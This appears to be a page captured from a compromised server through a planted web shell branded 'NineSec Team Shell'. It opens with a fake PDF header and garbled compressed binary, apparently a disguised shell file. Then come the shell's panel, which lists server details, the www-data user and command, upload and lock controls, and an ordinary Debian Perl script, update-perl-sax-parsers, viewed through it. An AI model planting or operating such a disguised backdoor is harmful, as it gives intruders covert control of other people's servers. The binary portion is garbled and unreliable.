%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 192.168.60.199  /  Your IP : 192.168.60.1
Web Server : Apache
System : Linux PROD-conference 6.8.12-17-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-17 (2025-11-21T11:16Z) x86_64
User : www-data ( 33)
PHP Version : 5.6.40-0+deb8u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/../run/../sbin/../usr/bin/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //home/../run/../sbin/../usr/bin/update-perl-sax-parsers
#!/usr/bin/perl
## ----------------------------------------------------------------------
## Debian update-perl-sax-parsers version 0.3
## ----------------------------------------------------------------------
## Copyright (C) 2001-2003 Ardo van Rangelrooij
## Copyright (C) 2007      Niko Tyni
##
## This is free software; see the GNU General Public Licence version 2
## or later for copying conditions.  There is NO warranty.
## ----------------------------------------------------------------------

## ----------------------------------------------------------------------
use strict;

## ----------------------------------------------------------------------
use File::Spec;
use Getopt::Long;
use XML::SAX;
use XML::SAX::Debian;
use File::Temp qw(tempfile);

## ----------------------------------------------------------------------
$0  =~ m|[^/]+$|;

## ----------------------------------------------------------------------
my $name = $&;

## ----------------------------------------------------------------------
my $add       = '';
my @directory = ();
my $file      = '';
my $help      = '';
my $quiet     = '';
my $remove    = '';
my $test      = '';
my $update    = '';
my $version   = '';
my $ucf;
my $priority;

## ----------------------------------------------------------------------
if ( ! GetOptions(
		  'add=s'       => \$add,
		  'directory=s' => \@directory,
		  'file=s'      => \$file,
		  'help'        => \$help,
		  'quiet'       => \$quiet,
		  'remove=s'    => \$remove,
		  'test'        => \$test,
		  'update'      => \$update,
		  'version'     => \$version,
		  'priority=i'  => \$priority,
		  'ucf=i'       => \$ucf,
		  )
     )
{
    &usage;
    exit 1;
}


## ----------------------------------------------------------------------
if ( $version )
{
    &version;
    exit 0;
}

## ----------------------------------------------------------------------
if ( $help )
{
    &usage;
    exit 0;
}

## ----------------------------------------------------------------------
print STDERR "$name: test mode - Perl SAX parsers file will not be updated\n"
    if $test && ! $quiet;

## ----------------------------------------------------------------------
# default priority is 50 unless --directory was specified
# with --directory, default to 0 (no priority in the filenames)
$priority = (@directory ? 0 : 50) if not defined $priority;

## ----------------------------------------------------------------------
my $PARSER_DETAILS_DIR  = "/var/lib/libxml-sax-perl/ParserDetails.d";
push( @directory, $PARSER_DETAILS_DIR) if ! @directory;

## ----------------------------------------------------------------------
# use ucf by default if --file is not specified
$ucf  = ($file ? 0 : 1) if not defined $ucf;

## ----------------------------------------------------------------------
my $PARSER_DETAILS_FILE = "/etc/perl/XML/SAX/ParserDetails.ini";
$file = $PARSER_DETAILS_FILE if ! $file;

## ----------------------------------------------------------------------
unless (XML::SAX->can("_is_vendor_supplied")) {
    print STDERR "$name: Non-vendor version of XML::SAX is installed.\n";
    print STDERR "$name: Automatic registration of SAX parsers might not work.\n";
}

if ( $add )
{
    print "$name: Registering Perl SAX parser $add with priority $priority...\n"
        unless $quiet;
    
    XML::SAX::Debian->save_parsers_debian( $add, $directory[0], $priority );
}
elsif ( $remove )
{
    print "$name: Unregistering Perl SAX parser $remove with priority $priority...\n"
        unless $quiet;
    
    my $parser_file = $remove;
    $parser_file = "${priority}-$parser_file" if $priority != 0;
    $parser_file = File::Spec->catfile( $directory[0], $parser_file );
    unlink( $parser_file );
}
elsif ( $update )
{
    print "$name: Updating overall Perl SAX parser modules info file...\n"
        unless $quiet;

    my ($handle, $tmpfile);

    if ($ucf) {
        ($handle, $tmpfile) = tempfile();
        chmod 0644, $tmpfile or die("chmod $tmpfile: $!");
    } else {
        open( $handle, ">$file" )
	        || die "Cannot write to $file: $!";
    }
    foreach my $directory ( @directory)
    {
	opendir( PARSER_DETAILS_DIR, $directory )
	    || die "Cannot access $directory: $!";
	my @files = sort readdir ( PARSER_DETAILS_DIR );
	for my $parser_details ( @files )
	{
	    next if $parser_details =~ /^\.\.?$/; # skip . and ..
	    open( PARSER_DETAILS, "$directory/$parser_details" )
		|| die "Cannot read from $parser_details: $!";
	    while ( <PARSER_DETAILS> ) { print $handle $_; }
	    close( PARSER_DETAILS );
	}
	closedir( PARSER_DETAILS_DIR );
    }
    close( $handle );
    if ($ucf) {
        system("ucf", "--debconf-ok", "--sum-file",  "/var/lib/libxml-sax-perl/ParserDetails.ini.md5sum", $tmpfile, $file);
        unlink $tmpfile or die("unlink $tmpfile: $!");
    }
}

## ----------------------------------------------------------------------
exit 0;

## ----------------------------------------------------------------------
sub usage
{
    print STDERR <<END;
Usage:
    $name <options> --add <parser_module>
    $name <options> --remove <parser_module>
    $name <options> --update

Options:
    --directory     Perl SAX parser module info file directory to be used
                    as target for 'add'/'remove' or as sources for 'update'
                    (default = '/var/lib/libxml-sax-perl/ParserDetails.d')
    --priority      The priority of the parser to add. The parser with the
                    highest priority is the default parser.
    --file          Perl SAX parser module info file to be updated
                    (default = '/etc/perl/XML/SAX/ParserDetails.ini')
    --ucf X         Forcibly disable (X == 0) or enable (X != 0) the use
                    of ucf with '--update'.
    --help          display this help text (usage)
    --quiet         be quiet
    --test          do not modify any files, enable debugging mode
    --version       display version number
END
}

## ----------------------------------------------------------------------
sub version
{
    print "Debian $name version 0.4\n";
}

## ----------------------------------------------------------------------

NineSec Team - 2022